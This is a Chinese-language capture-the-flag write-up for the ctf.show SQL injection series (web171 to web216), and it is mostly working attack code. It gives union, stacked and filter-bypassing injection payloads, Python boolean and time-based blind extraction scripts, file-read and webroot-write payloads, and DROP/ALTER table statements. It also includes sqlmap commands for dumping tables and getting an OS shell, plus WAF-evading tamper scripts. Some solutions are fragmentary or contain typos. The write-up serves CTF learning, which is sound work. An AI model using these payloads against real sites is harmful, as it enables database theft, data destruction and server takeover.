也是开始传说中的sql注入了，打开了新世界的大门，道阻且长继续加油o.0

SQL注入被俗称为黑客的填空游戏。

dd7b4be41b1295450cade0835fbea2bb_720w

web171

题目

1 2	//拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";

题解

使用or拼接sql语句，意思是如果没有9999就查询3

本题是没有显示id为25以后的数据的

payload：

1	999' or id = '26

web172

题目

这里面的模块有两个

要求useername不能为flag

题解

1	9999' union select id,password from ctfshow_user2 where username = 'flag

联合查询，并且将username换成id

web173

题目

对返回的值有没有flag进行检测

题解

payload：

1	9999' union select id,hex(b.username),b.password from ctfshow_user3 as b where b.username = 'flag

将username输出为二进制的值

web174

题目

题解

因为过滤了输出中的数字，所以使用符号替代数字

payload:

?id=0' union select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(to_base64(username),"1","@A"),"2","@B"),"3","@C"),"4","@D"),"5","@E"),"6","@F"),"7","@G"),"8","@H"),"9","@I"),"0","@J"),replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(to_base64(password),"1","@A"),"2","@B"),"3","@C"),"4","@D"),"5","@E"),"6","@F"),"7","@G"),"8","@H"),"9","@I"),"0","@J") from ctfshow_user4 where username="flag" --+

-- 和 +：这是注释语法，它们用于注释掉SQL语句中的其余部分，以确保后续内容不会影响查询。

解码脚本

import base64


flag64 = "xxx"

flag = flag64.replace("@A", "1").replace("@B", "2").replace("@C", "3").replace("@D", "4").replace("@E", "5").replace("@F", "6").replace("@G", "7").replace("@H", "8").replace("@I", "9").replace("@J", "0")

print(base64.b64decode(flag))

web175

题目

这题是这个系列最后一个无过滤注入

题解

输出被限制的时候可以尝试其他的信道带出：利用文件写入操作，into outfile

方法一：时间盲注

脚本没跑出来。。

方法二：文件写入

写入文件的前提是知道网站初始的目录，一般来说都是/var/www/html/

构造payload

1	0' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--+

web176

题目

过滤了select

题解

解法一

1	999' or username = 'flag

直接查字段

解法二

1	0' union Select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database() --+

联合查询表名

大小写绕过

1	0' union Select 1,2,group_concat(password) from ctfshow_user where username = 'flag' --+

web177

题目

题解

可以用/**/或者是%0a（回车）来绕过空格的过滤，%23（#）来绕过注释符的过滤，接着我们直接拿下flag

1	'//Union//Select//1,2,group_concat(password)//from//ctfshow_user//where/**/username='flag'%23

web178

题目

题解

跟上一题相比过滤掉了/**/注释符，但是能用回车（%0a）、括号、%09、%0c、%0d、%0b代替，一样

1	'%0aUnion%0aSelect%0a1,2,group_concat(password)%0afrom%0actfshow_user%0awhere%0ausername='flag'%23

web179

题目

题解

1	'%0cUnion%0cSelect%0c1,2,group_concat(password)%0cfrom%0cctfshow_user%0cwhere%0cusername='flag'%23

%0c可以使用

web180

题解

1	-1'%0cor%0cusername%0clike%0c'flag

模糊匹配

web181

1	-1'%0cor%0cusername%0clike%0c'flag

web182

题目的where语句处是and连接两个条件。可以考虑运算符优先级。

mysql操作符优先级：（数字越大，优先级越高）

优先级运算符
1 :=
2 || , OR , XOR
3 && , AND
4 NOT
5 BETWEEN, CASE, WHEN, THEN, ELSE
6 =, <=>, >=, >, <=, <, <>, !=, IS, LIKE, REGEXP, IN
7 |
8 &
9 <<, >>
10 -, +
11 *, /, DIV, %, MOD
12 ^
13 - (一元减号), ~ (一元比特反转)
14 !
15 BINARY, COLLATE
and的优先级高于or，需要同时满足两边的条件才会返回true，那么后面可以接一个or，or的两边有一个为true，既可以满足and。即：1 and 0 or 1

web183

题目

时间盲注

题解

import requests
import time

url = "http://643bcc02-350c-4881-95fb-06a1deda60af.challenge.ctf.show/select-waf.php"

flagstr = "}abcdefghijklmnopqrstuvwxyz-0123456789{"
#flagstr = "ctfshow{0123456789-}"
flag = ""
for i in range(0,40):
    tempStr = ""
    for x in flagstr:
        data={
        "tableName":"`ctfshow_user`where`pass`regexp(\"ctfshow{}\")".format(flag+x)
        }
        response = requests.post(url,data=data)
        time.sleep(0.3)
        if response.text.find("user_count = 1;")>0:
            flag+=x
    else:
        print("{} is wrong".format(x))
    print(flag)

web184

题目

过滤了where

题解

发现having和where可以替换，但是having语句有使用条件。

一个HAVING子句必须位于GROUP BY子句之后，并位于ORDER BY子句之前。

十六进制：可以前面加x，后面用引号包裹或者0x；也可以和算数运算结合表示数字。

测试：

1	tableName=ctfshow_user group by pass having pass like 0x63746673686f777b25

脚本

import requests
import time
url="http://d4466757-0b75-4a39-97c5-0b1a853512c2.challenge.ctf.show/select-waf.php"

flagstr="ctfshow{qeryuipadgjklzxvbnm0123456789-}_"   #40
flag=""
for i in range(0,40):
    for x in flagstr:
        data={
            "tableName":"ctfshow_user group by pass having pass like 0x63746673686f777b{}25".format("".join(hex(ord(i))[2:] for i in flag+x))
        }
        #print(data)
        response=requests.post(url,data=data)
        #有并发数量限制的，就睡一段时间
        time.sleep(0.3)
        if response.text.find("$user_count = 1;")>0:
            print("++++++++++++++++ {} is right".format(x))
            flag+=x
            break
        else:
            continue
    print("ctfshow{"+flag)

对脚本解释：

[2:]是一个切片操作，它用于从第三个字符开始截取字符串。因为已经提前写了0x这个16进制的开头了。

web185

题目

对数字进行过滤，需要我们构造字符串

题解

1	select concat(true+true,true+true);

true为1

false为2

用这个思想构造数字

脚本：

import requests
import time
import string

def formatString(str):
    temp="concat("
    for x in str:
        tip=0
        if x in string.digits:
            tmp=int(x)
        else:
            tip=1
            temp+="char("
            tmp=ord(x)
        if tmp == 0:
            temp+="false"
        else:
            temp_d="("
            for i in range(0,tmp):
                temp_d+="true+"
            temp_d=temp_d[:-1]+")"
            if tip==1:
                temp_d+=")"
            temp+=temp_d
        temp+=","
    temp=temp[:-1]+")"
    return temp

#print(formatString("0x63746673686f777b"))

url="http://1cde41e5-17c7-4db1-bd41-cc77ebaa7e85.challenge.ctf.show/select-waf.php"
#dic的顺序可以改一下！我是懒得改了！改顺序可以提高效率！！！
dic="ctfshow{qeryuipadgjklzxvbnm0123456789-}_"
flag="ctfshow{"
for i in range(0,40):
    for x in dic:
        data={
            "tableName":"ctfshow_user group by pass having pass regexp({})".format(formatString(flag+x))
        }
        #print(data)
        response=requests.post(url,data=data)
        time.sleep(0.3)
        if response.text.find("$user_count = 1;")>0:
            print("[**] {} is right".format(x))
            flag+=x
            break
        else:
            #print("[--] {} is wrong".format(x))
            continue
    print("[flag]:"+flag)

web186

上一题的脚本仍然可以使用。

web187

题目

1	string md5( string $str[, bool $raw_output = false] )

raw_output：如果可选的 raw_output 被设置为 TRUE，那么 MD5 报文摘要将以16字节长度的原始二进制格式返回。

要使用到万能密码

ffifdyop

题解

1	select '1' or '字符串'

只要字符串不为0开头就返回恒为真。

paylod：

1	select count(*) from user where username ='' or '6nb'

这里的二进制格式，并不是指转成0101，而是binary mode。

web188

题目

如果username没有用’’保护起来就会返回全部的值

题解

username为0

password为0

抓包就可以

web189

题目

提示

1	flag在api/index.php文件中

题解

import requests
import time

url = "http://6ac41a56-faf0-4d7f-a34b-783b37a00d1b.challenge.ctf.show/api/"
flagstr = "}{<>$=,;_ 'abcdefghijklmnopqr-stuvwxyz0123456789"

flag = ""
#这个位置，是群主耗费很长时间跑出来的位置~
for i in range(257,257+60):
	for x in flagstr:
		data={
		"username":"if(substr(load_file('/var/www/html/api/index.php'),{},1)=('{}'),1,0)".format(i,x),
		"password":"0"
		}
		#print(data)
		response = requests.post(url,data=data)
		time.sleep(0.3)
		# 8d25是username=1时的页面返回内容包含的，具体可以看上面的截图~
		if response.text.find("8d25")>0:
			print("++++++++++++++++++ {} is right".format(x))
			flag+=x
			break
		else:
			continue
	print(flag)

执行命令载入文件内容

web190

题目

布尔盲注

题解脚本

import requests
import sys
import time

url = "http://de81ce39-b97b-47be-84e6-1daf7cc186af.challenge.ctf.show/api/"
flag = ""
for i in range(1,60):
    max = 127
    min = 32
    while 1:
        mid = (max+min)>>1
        if(min == mid):
            flag += chr(mid)
            print(flag)
            break
        #payload = "admin'and (ascii(substr((select database()),{},1))<{})#".format(i,mid)
        #ctfshow_web
        #payload = "admin'and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{})#".format(i,mid)
        #ctfshow_fl0g
        #payload = "admin'and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{},1))<{})#".format(i,mid)
        #id,f1ag
        payload = "admin'and (ascii(substr((select f1ag from ctfshow_fl0g),{},1))<{})#".format(i,mid)

        data = {
            "username":payload,
            "password":0,
        }
        res = requests.post(url = url,data =data)
        time.sleep(0.3)
        if res.text.find("8bef")>0:
            max = mid
        else:
            min = mid

web191

题目

相较于上一题增加了对ascii的过滤

题解

把上题脚本的ascii改为ord

web192

题目

过滤了

//密码检测
if(!is_numeric($password)){
  $ret['msg']='密码只能为数字';
  die(json_encode($ret));
}

//密码判断
if($row['pass']==$password){
    $ret['msg']='登陆成功';
  }

//TODO:感觉少了个啥，奇怪
  if(preg_match('/file|into|ascii|ord|hex/i', $username)){
      $ret['msg']='用户名非法';
      die(json_encode($ret));
  }

题解

# @Author:feng
import requests
from time import time

url='http://b5aa8d9c-b59e-442b-b6fd-e94840cb9c80.challenge.ctf.show/api/index.php'

flag=''
for i in range(1,100):
    length=len(flag)
    min=32
    max=128
    while 1:
        j=min+(max-min)//2
        if min==j:
            flag+=chr(j)
            print(flag.lower())
            if chr(j)==" ":
                exit()
            break

        payload="' or if(substr((select group_concat(f1ag) from ctfshow_fl0g),{},1)<'{}',1,0)-- -".format(i,chr(j))

        data={
            'username':payload,
            'password':1
        }
        r=requests.post(url=url,data=data).text
        #print(r)
        if r"\u5bc6\u7801\u9519\u8bef" in r:
            max=j
        else :
            min=j

web193

题目

//密码检测
if(!is_numeric($password)){
  $ret['msg']='密码只能为数字';
  die(json_encode($ret));
}

//密码判断
if($row['pass']==$password){
    $ret['msg']='登陆成功';
  }

//TODO:感觉少了个啥，奇怪
  if(preg_match('/file|into|ascii|ord|hex|substr/i', $username)){
      $ret['msg']='用户名非法';
      die(json_encode($ret));
  }

过滤了substr

题解

substr被ban了，那就直接正则用like,regexp啥的吧不多弄了。还要注意表名改了，要重新注出来：

# @Author:feng
import requests

url='http://8ccd1084-322d-4fd7-86e9-81f5c50679c2.challenge.ctf.show/api/index.php'
flag=""
for i in range(0,100):
    for j in "0123456789abcdefghijklmnopqrstuvwxyz-,{}_":
        #payload="' or if((select group_concat(table_name) from information_schema.tables where table_schema=database()) like '{}',1,0)-- -".format(flag+j+"%")
        #payload="' or if((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg') like '{}',1,0)-- -".format(flag+j+"%")
        payload="' or if((select group_concat(f1ag) from ctfshow_flxg) like '{}',1,0)-- -".format(flag+j+"%")

        data={
            'username':payload,
            'password':1
        }
        #print(payload)
        r=requests.post(url=url,data=data)
        #print(payload)
        if r"\u5bc6\u7801\u9519\u8bef" in r.text:
            flag+=j
            print(flag)
            if j=='}':
                exit()
            break

web194

题目

布尔盲注

过滤

//密码检测
if(!is_numeric($password)){
  $ret['msg']='密码只能为数字';
  die(json_encode($ret));
}

//密码判断
if($row['pass']==$password){
    $ret['msg']='登陆成功';
  }

//TODO:感觉少了个啥，奇怪
  if(preg_match('/file|into|ascii|ord|hex|substr|char|left|right|substring/i', $username)){
      $ret['msg']='用户名非法';
      die(json_encode($ret));
  }

题解

# @Author:Y4tacker
import requests
# 应该还可以用instr等函数，LOCATE、POSITION、INSTR、FIND_IN_SET、IN、LIKE
url = "http://711d56c7-9652-4fc0-b8e6-20beafccb0bb.challenge.ctf.show/api/"
final = ""
stttr = "flag{}-_1234567890qwertyuiopsdhjkzxcvbnm"
for i in range(1,45):
    for j in stttr:
        final += j
        # 查表名-ctfshow_flxg
        payload = f"admin' and if(locate('{final}',(select table_name from information_schema.tables where table_schema=database() limit 0,1))=1,1,2)='1"
        # 查字段-f1ag
        # payload = f"admin' and if(locate('{final}',(select column_name from information_schema.columns where table_name='ctfshow_flxg' limit 1,1))=1,1,2)='1"
        #payload = f"admin' and if(locate('{final}',(select f1ag from ctfshow_flxg limit 0,1))=1,1,2)='1"
        data = {
            'username': payload,
            'password': '1'
        }
        r = requests.post(url,data=data)
        if "密码错误" == r.json()['msg']:
            print(final)
        else:
            final = final[:-1]

分析一下他核心的paylaod

就是查询第一行，最后的=‘1是为了让sql语句为永真式

web195

题目

开始堆叠注入

题解

因为给了表名

update修改数据库

1	1;update`ctfshow_user`set`pass`=1

还可以用16进制，因为${username}没有用引号保护

1	0x61646d696e;update`ctfshow_user`set`pass`=1

用0进行弱类型匹配会和任意字符进行匹配

username：0

pass：1

web196

题目

题解

ASEdase

web197

题目

题解

解法一

1	O:drop table ctfshow_user; create table ctfshow_user('usermame" varchar(100), pass" varchar(100)); insert ctfshow_user('usermame","pass") value(1,2)

解法二

alter table利用alter修改字段名，把id和pass对调。

1
2
3

username:   0;alter table ctfshow_user change column `pass` `a` varchar(255);alter table ctfshow_user change column `id` `pass` varchar(255);alter table ctfshow_user change column `a` `id` varchar(255)
pass:       数字自增测试
# 注意用户名第一次填 payload,之后就只填 0

这个pass需要自己尝试，后面的脚本就实现自动尝试

还有一个脚本

# @Author:Y4tacker
import requests

url = "http://01e38040-0e5a-4109-9fa4-6e2c11b0517d.challenge.ctf.show/api/"
for i in range(100):
    if i == 0:
        data = {
            'username': '0;alter table ctfshow_user change column `pass` `ppp` varchar(255);alter table ctfshow_user '
                        'change column `id` `pass` varchar(255);alter table ctfshow_user change column `ppp` `id` '
                        'varchar(255);',
            'password': f'{i}'
        }
        r = requests.post(url, data=data)
    data = {
        'username': '0x61646d696e',
        'password': f'{i}'
    }
    r = requests.post(url, data=data)
    if "登陆成功" in r.json()['msg']:
        print(r.json()['msg'])
        break

web198

题目

过滤了一个drop

//TODO:感觉少了个啥，奇怪,不会又双叒叕被一血了吧
if('/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set|create|drop/i', $username)){
  $ret['msg']='用户名非法';
  die(json_encode($ret));
}

if($row[0]==$password){
    $ret['msg']="登陆成功 flag is $flag";
}

题解

只能用alter，就用上题那个脚本

web199

题目

过滤了括号

题解

利用show。根据题目给的查询语句，可以知道数据库的表名为ctfshow_user，那么可以通过show tables，获取表名的结果集，在这个结果集里定然有一行的数据为ctfshow_user。

或者

1	0;alter table ctfshow_user change `username` `passw` text;alter table ctfshow_user change `pass` `username` text;alter table ctfshow_user change `passw` `pass` text;

然后用默认口令userAUTO登入

web120

题解

同上

web201

题目

开始系统练习sqlmap的使用

使用–user-agent 指定agent

使用–referer 绕过referer检查

题解

爆数据库

1	sqlmap -u "http://10f59b15-eadb-4add-ae79-ae2d4b9eeb01.challenge.ctf.show/api/?id=1" --referer="ctf.show" --dbs

爆表名

1	sqlmap -u "http://10f59b15-eadb-4add-ae79-ae2d4b9eeb01.challenge.ctf.show/api/?id=1" --referer="ctf.show" -D ctfshow_web --tables

爆字段

1	sqlmap -u "http://10f59b15-eadb-4add-ae79-ae2d4b9eeb01.challenge.ctf.show/api/?id=1" --referer="ctf.show" -D ctfshow_web -T ctfshow_user --columns

查flag

1	sqlmap -u "http://10f59b15-eadb-4add-ae79-ae2d4b9eeb01.challenge.ctf.show/api/?id=1" --referer="ctf.show" -D ctfshow_web -T ctfshow_user -C pass --dump --where "pass like '%ctfshow%'"

web202

题目

使用–data 调整sqlmap的请求方式

题解

1	sqlmap -u "http://6497680f-199a-4a51-89c8-c4c06cae7530.challenge.ctf.show/api/" -data "id=1" --referer="ctf.show" -D ctfshow_web -T ctfshow_user -C pass --dump --where "pass like '%ctfshow%'"

web203

题目

使用–method 调整sqlmap的请求方式

题解

sqlmap -u "http://cc5164e8-3f5e-40e3-a153-d8da2eb9878a.challenge.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --dbms=mysql -D ctfshow_web -T ctfshow_user --dump --batch

web204

题目

使用–cookie 提交cookie数据

题解

sqlmap -u "http://82903868-ed06-4658-8c0c-09b5d12b63ca.challenge.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --cookie="PHPSESSID=vdl2nbcir7clj1j46c806ct956;ctfshow=25a1553f2eebe9af47e00bdc9126795b" --headers="Content-Type: text/plain" --dbms=mysql -D ctfshow_web -T ctfshow_user --dump --batch

web205

题目

api调用需要鉴权

题解

sqlmap -u "http://5a11ef81-3935-4d1a-aeaa-f47bb64873e3.challenge.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql dbs=ctfshow_web -T ctfshow_flax -C flagx --dump  --headers="Content-Type: text/plain" --safe-url="http://5a11ef81-3935-4d1a-aeaa-f47bb64873e3.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch

web206

题目

sql需要闭合

题解

sqlmap -u http://a3c7ed79-34db-44db-a600-af9a0d55eb0e.challenge.ctf.show/api/index.php --safe-url=http://a3c7ed79-34db-44db-a600-af9a0d55eb0e.challenge.ctf.show/api/getToken.php --safe-freq=1 --method=PUT --headers="Content-Type: text/plain" --data="id=1" --dbms=mysql --current-db --tables -T ctfshow_flaxc --columns -C flagv --dump --level=3

sqlmap -u "http://a3c7ed79-34db-44db-a600-af9a0d55eb0e.challenge.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql --dump --headers="Content-Type: text/plain" --safe-url="http://a3c7ed79-34db-44db-a600-af9a0d55eb0e.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch

web207

题目

–tamper 的初体验

题解

sqlmap -u "http://795656d9-3dec-4e59-95a8-8ce69ee92dfa.challenge.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql --dump --headers="Content-Type: text/plain" --safe-url="http://795656d9-3dec-4e59-95a8-8ce69ee92dfa.challenge.ctf.show/api/getToken.php" --tamper=space2comment --safe-freq=1 --batch

加一句

1	--tamper=space2comment

web208

题目

–tamper 的2体验

题解

sqlmap -u "http://bff19190-d1db-48b9-985b-0927820224f5.challenge.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql --dump --headers="Content-Type: text/plain" --safe-url="http://bff19190-d1db-48b9-985b-0927820224f5.challenge.ctf.show/api/getToken.php" --tamper=space2comment --safe-freq=1 --batch

web209

题目

–tamper 的3体验

题解

自己写tamper脚本

sqlmap -u http://004c0fcd-8698-4f48-8de6-05e807fdb9aa.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show  --headers="Content-Type:text/plain" --safe-url="http://004c0fcd-8698-4f48-8de6-05e807fdb9aa.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web -T ctfshow_flav --dump  --tamper=web209 --batch

#!/usr/bin/env python

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def tamper(payload, **kwargs):
    payload = space2comment(payload)
    return payload

def space2comment(payload):
    retVal = payload
    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += chr(0x09)
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == '=':
                retVal += chr(0x09) + 'like' + chr(0x09)
                continue

            elif payload[i] == " " and not doublequote and not quote:
                retVal += chr(0x09)
                continue

            retVal += payload[i]

    return retVal

在sqlmap/temper新建web209.py

web210

题目

–tamper 的4体验

题解

sqlmap -u http://c361749f-0ae7-4380-bee1-c9660ecfc032.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show  --headers="Content-Type:text/plain" --safe-url="http://c361749f-0ae7-4380-bee1-c9660ecfc032.challenge.ctf.show/api/getToken.php" --safe-freq=1 --dump --tamper=web210 --batch

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
from base64 import *

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):


    retVal = payload
    retVal = retVal.replace("-- -", "#")
    retVal = b64encode("".join(reversed(b64encode("".join(reversed(retVal)).encode('utf-8')).decode('utf-8'))).encode('utf-8')).decode('utf-8')

    return retVal

反过来

web211

题目

–tamper 的5体验

//对查询字符进行解密
  function decode($id){
    return strrev(base64_decode(strrev(base64_decode($id))));
  }
function waf($str){
    return preg_match('/ /', $str);
}

题解

sqlmap -u http://6403248a-8fe5-4725-aa50-32bae320a928.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show  --headers="Content-Type:text/plain" --safe-url="http://6403248a-8fe5-4725-aa50-32bae320a928.challenge.ctf.show/api/getToken.php" --safe-freq=1 --dump --tamper=web210 --batch

这题是对空格进行了过滤，用/**/代替即可

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
from base64 import *

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):


    retVal = payload
    retVal = retVal.replace(" ", "/**/")
    retVal = b64encode("".join(reversed(b64encode("".join(reversed(retVal)).encode('utf-8')).decode('utf-8'))).encode('utf-8')).decode('utf-8')

    return retVal

web212

题目

–tamper 的6体验

function decode($id){
    return strrev(base64_decode(strrev(base64_decode($id))));
  }
function waf($str){
    return preg_match('/ |\*/', $str);
}

题解

sqlmap -u http://f37c0235-580a-413c-9049-b969dda22cbd.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show  --headers="Content-Type:text/plain" --safe-url="http://f37c0235-580a-413c-9049-b969dda22cbd.challenge.ctf.show/api/getToken.php" --safe-freq=1 --dump --tamper=web212 --batch

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
from base64 import *

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def space2comment(payload):
    retVal = payload
    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += chr(0x0a)
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == "*":
                retVal += chr(0x31)
                continue

            elif payload[i] == "=":
                retVal += chr(0x0a)+'like'+chr(0x0a)
                continue

            elif payload[i] == " " and not doublequote and not quote:
                retVal += chr(0x0a)
                continue

            retVal += payload[i]

    return retVal


def tamper(payload, **kwargs):

    payload = space2comment(payload)
    retVal = payload
    retVal = retVal.replace(" ","/**/")
    retVal = b64encode("".join(reversed(b64encode("".join(reversed(retVal)).encode('utf-8')).decode('utf-8'))).encode('utf-8')).decode('utf-8')

    return retVal

"".join(reversed(retVal)): 这一部分将retVal字符串中的字符进行反转。
b64encode("".join(reversed(retVal)).encode('utf-8')): 然后，反转后的字符串被使用Base64进行编码。
b64encode("".join(reversed(b64encode("".join(reversed(retVal)).encode('utf-8')).decode('utf-8'))).encode('utf-8'): 先前编码的字符串再次被反转，然后对该反转后的字符串进行第二次Base64编码。
decode('utf-8'): 最后，经过双重Base64编码的字符串被解码回UTF-8字符串。

最后这句转码也可以写成

1
2
3

if payload:
    retVal = base64.b64encode(payload[::-1].encode('utf-8'))
    retVal = base64.b64encode(retVal[::-1]).decode('utf-8')

if payload:: 此条件检查变量 payload 是否非空或评估为 True。如果有效载荷为空或评估为 False，则不会执行 if 语句内的代码块。
retVal = base64.b64encode(payload[::-1].encode('utf-8')): 如果有效载荷不为空，以下是代码执行步骤：
- payload[::-1]: 颠倒有效载荷中的字符顺序。
- encode('utf-8'): 使用 UTF-8 编码将颠倒的有效载荷转换为字节。
- base64.b64encode(...): 使用 base64 编码对 UTF-8 字节进行编码。
- 结果被赋值给变量 retVal。
retVal = base64.b64encode(retVal[::-1]).decode('utf-8'): 此行进一步处理先前步骤中获得的结果：
- retVal[::-1]: 颠倒先前编码和颠倒的有效载荷中的字符。
- base64.b64encode(...): 使用 base64 编码对颠倒的有效载荷进行编码。
- decode('utf-8'): 将双重编码的 base64 字节解码为 UTF-8 字符串。
- 最终结果被赋值给变量 retVal。

web213

题目

练习使用–os-shell 一键getshell

//对查询字符进行解密
  function decode($id){
    return strrev(base64_decode(strrev(base64_decode($id))));
  }
function waf($str){
    return preg_match('/ |\*/', $str);
}

题解

os-shell 执行原理

对于mysql数据库来说，–os-shell的本质就是写入两个php文件，其中的tmpugvzq.php可以让我们上传文件到网站路径下然后sqlmap就会通过上面这个php上传一个用于命令执行的tmpbylqf.php到网站路径下，让我们命令执行，并将输出的内容返回sqlmap端。

sqlmap -u http://d2f177c1-6ddc-4f4f-94a9-2dd51684a10a.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show  --headers="Content-Type:text/plain" --safe-url="http://d2f177c1-6ddc-4f4f-94a9-2dd51684a10a.challenge.ctf.show/api/getToken.php" --safe-freq=1 --os-shell  --tamper=web212 --batch

1
2
3

sqlmap -u "http://d2f177c1-6ddc-4f4f-94a9-2dd51684a10a.challenge.ctf.show/api/index.php" --method="PUT" 
--data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --cookie="PHPSESSID=j6fo9qlp4cqpi7hc632ais5pqu" 
--safe-url="http://d2f177c1-6ddc-4f4f-94a9-2dd51684a10a.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web211.py --os-shell

web214

题目

没有过滤的时间盲注

题解

跑一个脚本

import requests

url = "http://7a6a7ff4-b343-407a-bc3f-de5ebae96b51.challenge.ctf.show/api/"

#查table_name
#payload = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{},sleep(2),0)"
#if()如果比较为真执行sleep(2)让查询等待两秒，如果为假则返回0
#ascii()比较提取的ASCII值与动态生成的值{}是否大于的比较操作，实现二分法搜索
#substr()提取特定{}位置字符
#select group_concat(table_name) from information_schema.tables where table_schema=database(): 这是一个 SQL 查询，用于从 information_schema.tables 表中选择当前数据库中所有表的表名，并使用 group_concat 将它们拼接成一个字符串。

#得到ctfsho_flagx,ctfshow_info

#查column_name
#payload = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'),{},1))>{},sleep(2),0)"
#相较于上一个payload，sql查询语句有了变化，group_concat()的值为column_name,后面information_schema.columns，也变成从table_name里面查询

payload = "if(ascii(substr((select group_concat(flaga) from ctfshow_flagxc),{},1))>{},sleep(2),0) and '1'='1"
#查flaga的值

i = 0
result = ""

while True:
    i += 1
    head = 0
    tail = 127
    while head<tail:
        mid = (head+tail)//2
        data = {
            "debug" : 1,
            "ip" : payload.format(i,mid)
        }
        try:
            #如果这个请求成功，没有引发异常，那么 response 将保存响应对象，而 tail 将被设置为当前二分搜索的中间值 mid
            response = requests.post(url=url,data=data,timeout=2)
            tail=mid
        except Exception as e:
            #这是一个捕获异常的块，它捕获所有类型的异常并将异常对象保存在 e 变量中
            head = mid+1
            #如果请求过程中发生了异常，通常说明当前的 mid 值太大，导致请求失败。为了继续二分搜索，将 head 更新为 mid + 1。
    if head == 0:
        break
    result += chr(head)
    #chr(head): 这是一个内置函数，它将一个 ASCII 数值转换为相应的字符
    print(result.lower())
    #result.lower(): 这是一个字符串方法，用于将字符串中的所有字符转换为小写形式。

web215

题目

用了单引号，需要我们添加注释来闭合

题解

对上一题的脚本的paylaod进行修改

1	1' or if()>{},sleep(2),0) and '1'='1

import requests

url = "http://c412a173-066e-4c22-a651-5b41a47124d1.challenge.ctf.show/api/"

#查table_name
#payload = "1' or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{},sleep(2),0) and '1'='1"
#if()如果比较为真执行sleep(2)让查询等待两秒，如果为假则返回0
#ascii()比较提取的ASCII值与动态生成的值{}是否大于的比较操作，实现二分法搜索
#substr()提取特定{}位置字符
#select group_concat(table_name) from information_schema.tables where table_schema=database(): 这是一个 SQL 查询，用于从 information_schema.tables 表中选择当前数据库中所有表的表名，并使用 group_concat 将它们拼接成一个字符串。

#得到ctfshow_flagxc

#查column_name
#payload = "1' or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{},1))>{},sleep(2),0)#"
#相较于上一个payload，sql查询语句有了变化，group_concat()的值为column_name,后面information_schema.columns，也变成从table_name里面查询
#id,flagaa,info
payload = "1' or if(ascii(substr((select group_concat(flagaa) from ctfshow_flagxc),{},1))>{},sleep(2),0)-- +"
#查flaga的值

i = 0
result = ""

while True:
    i += 1
    head = 0
    tail = 127
    while head<tail:
        mid = (head+tail)//2
        data = {
            "debug" : 1,
            "ip" : payload.format(i,mid)
        }
        try:
            #如果这个请求成功，没有引发异常，那么 response 将保存响应对象，而 tail 将被设置为当前二分搜索的中间值 mid
            response = requests.post(url=url,data=data,timeout=2)
            tail=mid
        except Exception as e:
            #这是一个捕获异常的块，它捕获所有类型的异常并将异常对象保存在 e 变量中
            head = mid+1
            #如果请求过程中发生了异常，通常说明当前的 mid 值太大，导致请求失败。为了继续二分搜索，将 head 更新为 mid + 1。
    if head == 0:
        break
    result += chr(head)
    #chr(head): 这是一个内置函数，它将一个 ASCII 数值转换为相应的字符
    print(result.lower())
    #result.lower(): 这是一个字符串方法，用于将字符串中的所有字符转换为小写形式。
#ctfshow{841c7380-86e8-4059-906d-d6fg06a17a21}
#ctfshow{841c7380-86e8-4059-906d-d6ff06a17a21}

web216

题目

括号闭合

1	where id = from_base64($id);
